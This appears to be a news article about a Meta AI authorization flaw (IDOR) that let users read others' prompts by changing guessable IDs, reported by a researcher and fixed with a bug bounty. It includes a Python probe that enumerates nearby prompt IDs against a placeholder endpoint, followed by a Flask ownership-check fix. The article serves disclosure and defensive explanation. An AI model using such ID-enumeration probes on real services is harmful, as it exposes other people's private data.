Meta AI reportedly contained a security vulnerability that could allow unauthorized access to users' private interactions with the chatbot. Exploiting the flaw did not require compromising Meta's server infrastructure or altering the application's code; it could be carried out simply through analysis of network traffic. A security researcher identified the bug late last year and alerted the Menlo Park-based tech firm, which deployed a fix in January and rewarded the researcher for responsibly disclosing the issue.
According to a TechCrunch report, the vulnerability in Meta AI was discovered by Sandeep Hodkasia, founder of the security testing firm AppSecure. He reported the issue to Meta in December 2024 and earned a bug bounty of $10,000 (approximately Rs. 8.5 lakh) for the finding. Meta spokesperson Ryan Daniels confirmed to the publication that the problem was resolved in January and said the company found no evidence of malicious exploitation.
The vulnerability was rooted in how Meta AI processed user prompts on its servers. According to the researcher, when a user edits a prompt to regenerate text or an image, the chatbot assigns the prompt and its generated response a unique numeric identifier. This happens routinely, as users often refine their requests to get better results.
Hodkasia discovered that by monitoring his browser's network traffic while editing an AI prompt, he could see the unique identifier assigned to it. By changing that number, he could reportedly retrieve another user's prompt and the corresponding AI output. He noted that the identifiers were "easily guessable," so finding a valid ID took little effort.
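To make the attack pattern concrete, here is a minimal sketch of the kind of identifier-walking probe described, written in Python. The endpoint URL, cookie, and response shape are hypothetical stand-ins and do not reflect Meta's actual API; the sketch only illustrates the general technique of guessing nearby ID values starting from one observed in the attacker's own network traffic.

```python
# Hypothetical sketch of the probe pattern described above. The endpoint,
# cookie name, and ID value are illustrative assumptions, not Meta's API.
import requests

BASE_URL = "https://example.com/api/prompts"  # placeholder endpoint
SESSION_COOKIE = {"session": "attackers-own-valid-session"}  # placeholder

def fetch_prompt(prompt_id: int) -> dict | None:
    """Request the prompt/response pair stored under a numeric identifier."""
    resp = requests.get(
        f"{BASE_URL}/{prompt_id}", cookies=SESSION_COOKIE, timeout=10
    )
    return resp.json() if resp.status_code == 200 else None

# Because the identifiers were "easily guessable", an attacker could simply
# walk the ID values near one observed in their own browser traffic.
my_prompt_id = 1000042  # hypothetical ID seen while editing one's own prompt
for candidate in range(my_prompt_id - 5, my_prompt_id + 5):
    data = fetch_prompt(candidate)
    if data is not None:
        # If the server never checks ownership, this data may belong
        # to a completely different user.
        print(candidate, data)
```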
The core issue was authorization: Meta's servers accepted these unique identifiers without verifying that the requesting user actually owned the underlying data, a class of bug commonly known as an insecure direct object reference (IDOR). Had malicious actors exploited it first, the flaw could have exposed a substantial amount of private user information.
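For contrast, here is a minimal sketch of the server-side check that was evidently missing, using Flask purely as an illustration. The route, in-memory store, and session handling are assumptions made for the example; the point is that authentication alone is not enough, and the server must also confirm that the requested prompt belongs to the authenticated user.

```python
# Minimal illustrative sketch of a per-request ownership check. The route,
# data store, and session scheme are assumptions, not Meta's implementation.
from flask import Flask, abort, jsonify, session

app = Flask(__name__)
app.secret_key = "dev-only-placeholder"

# Hypothetical store mapping prompt_id -> (owner_user_id, content).
PROMPTS = {
    1000042: ("user_a", "draft of a private message"),
    1000043: ("user_b", "a medical question"),
}

@app.route("/api/prompts/<int:prompt_id>")
def get_prompt(prompt_id: int):
    record = PROMPTS.get(prompt_id)
    if record is None:
        abort(404)
    owner, content = record
    # The authorization step the vulnerable endpoint reportedly skipped:
    # compare the resource owner against the authenticated user.
    if session.get("user_id") != owner:
        abort(403)  # authenticated, but not authorized for this resource
    return jsonify({"id": prompt_id, "prompt": content})
```

Random, non-sequential identifiers would have made guessing harder, but only a per-request ownership check like the one above actually closes this kind of hole.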
Notably, a report released last month revealed that the Meta AI app's discover feed contained posts resembling private exchanges with the chatbot, including requests for medical and legal advice and even confessions of criminal activity. In June, the company rolled out a warning message to discourage users from unintentionally sharing their conversations.